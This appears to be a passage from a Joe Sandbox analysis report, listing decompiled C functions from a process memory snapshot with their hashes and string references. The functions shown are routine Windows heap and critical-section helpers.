              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8b47cd1294966fdf92b2eb7cc101825e0cbb12638a1a0b33f7f9a35caefd926e
              • Instruction ID: afe8e47ab400009d417b44e48f89d4cc237106d2df66a8650550d835e3463048
              • Opcode Fuzzy Hash: 8b47cd1294966fdf92b2eb7cc101825e0cbb12638a1a0b33f7f9a35caefd926e
              • Instruction Fuzzy Hash: 49E0DFB120F2049FEB38EB66D064F3D3798DF42729F1980DDE00A4B102E621F880C25A
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E04C7D380(void* __ecx, void* __edx, intOrPtr _a4) {
              				void* _t5;
              
              				if(_a4 != 0) {
              					_t5 = L04BCE8B0(__ecx, _a4, 0xfff);
              					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
              					return _t5;
              				}
              				return 0xc000000d;
              			}





              C-Code - Quality: 100%
              			E04BFA185() {
              				void* __ecx;
              				intOrPtr* _t5;
              
              				if( *0x4cb67e4 >= 0xa) {
              					if(_t5 < 0x4cb6800 || _t5 >= 0x4cb6900) {
              						return L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
              					} else {
              						goto L1;
              					}
              				} else {
              					L1:
              					return E04BE0010(0x4cb67e0, _t5);
              				}
              			}






              C-Code - Quality: 100%
              			E04BF16E0(void* __edx, void* __eflags) {
              				void* __ecx;
              				void* _t3;
              
              				_t3 = E04BF1710(0x4cb67e0);
              				if(_t3 == 0) {
              					_t6 =  *[fs:0x30];
              					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
              						goto L1;
              					} else {
              						return L04BE4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
              					}
              				} else {
              					L1:
              					return _t3;
              				}
              			}






              C-Code - Quality: 100%
              			E04BF35A1(void* __eax, void* __ebx, void* __ecx) {
              				void* _t6;
              				void* _t10;
              				void* _t11;
              
              				_t10 = __ecx;
              				_t6 = __eax;
              				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
              					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
              				}
              				if( *((char*)(_t11 - 0x1a)) != 0) {
              					return E04BDEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
              				}
              				return _t6;
              			}







              C-Code - Quality: 100%
              			E04BDAAB0() {
              				intOrPtr* _t4;
              
              				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
              				if(_t4 != 0) {
              					if( *_t4 == 0) {
              						goto L1;
              					} else {
              						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
              					}
              				} else {
              					L1:
              					return 0x7ffe0030;
              				}
              			}





              C-Code - Quality: 100%
              			E04C4A537(intOrPtr _a4, intOrPtr _a8) {
              
              				return L04BE8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
              			}




              C-Code - Quality: 100%
              			E04BCDB40() {
              				signed int* _t3;
              				void* _t5;
              
              				_t3 = L04BE4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
              				if(_t3 == 0) {
              					return 0;
              				} else {
              					 *_t3 =  *_t3 | 0x00000400;
              					return _t3;
              				}
              			}






              C-Code - Quality: 100%
              			E04BCAD30(intOrPtr _a4) {
              
              				return L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
              			}




              C-Code - Quality: 100%
              			E04BD76E2(void* __ecx) {
              				void* _t5;
              
              				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
              					return L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
              				}
              				return _t5;
              			}





              C-Code - Quality: 100%
              			E04BF36CC(void* __ecx) {
              
              				if(__ecx > 0x7fffffff) {
              					return 0;
              				} else {
              					return L04BE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
              				}
              			}




              C-Code - Quality: 100%
              			E04BE3A1C(intOrPtr _a4) {
              				void* _t5;
              
              				return L04BE4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
              			}





              C-Code - Quality: 100%
              			E04BE7D50() {
              				intOrPtr* _t3;
              
              				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
              				if(_t3 != 0) {
              					return  *_t3;
              				} else {
              					return _t3;
              				}
              			}





              C-Code - Quality: 53%
              			E04C5FDDA(intOrPtr* __edx, intOrPtr _a4) {
              				void* _t7;
              				intOrPtr _t9;
              				intOrPtr _t10;
              				intOrPtr* _t12;
              				intOrPtr* _t13;
              				intOrPtr _t14;
              				intOrPtr* _t15;
              
              				_t13 = __edx;
              				_push(_a4);
              				_t14 =  *[fs:0x18];
              				_t15 = _t12;
              				_t7 = E04C0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
              				_push(_t13);
              				E04C55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
              				_t9 =  *_t15;
              				if(_t9 == 0xffffffff) {
              					_t10 = 0;
              				} else {
              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
              				}
              				_push(_t10);
              				_push(_t15);
              				_push( *((intOrPtr*)(_t15 + 0xc)));
              				_push( *((intOrPtr*)(_t14 + 0x24)));
              				return E04C55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
              			}











              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C5FDFA
              Strings
              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C5FE01
              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C5FE2B
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
              • API String ID: 885266447-3903918235
              Uniqueness

              Uniqueness Score: -1.00%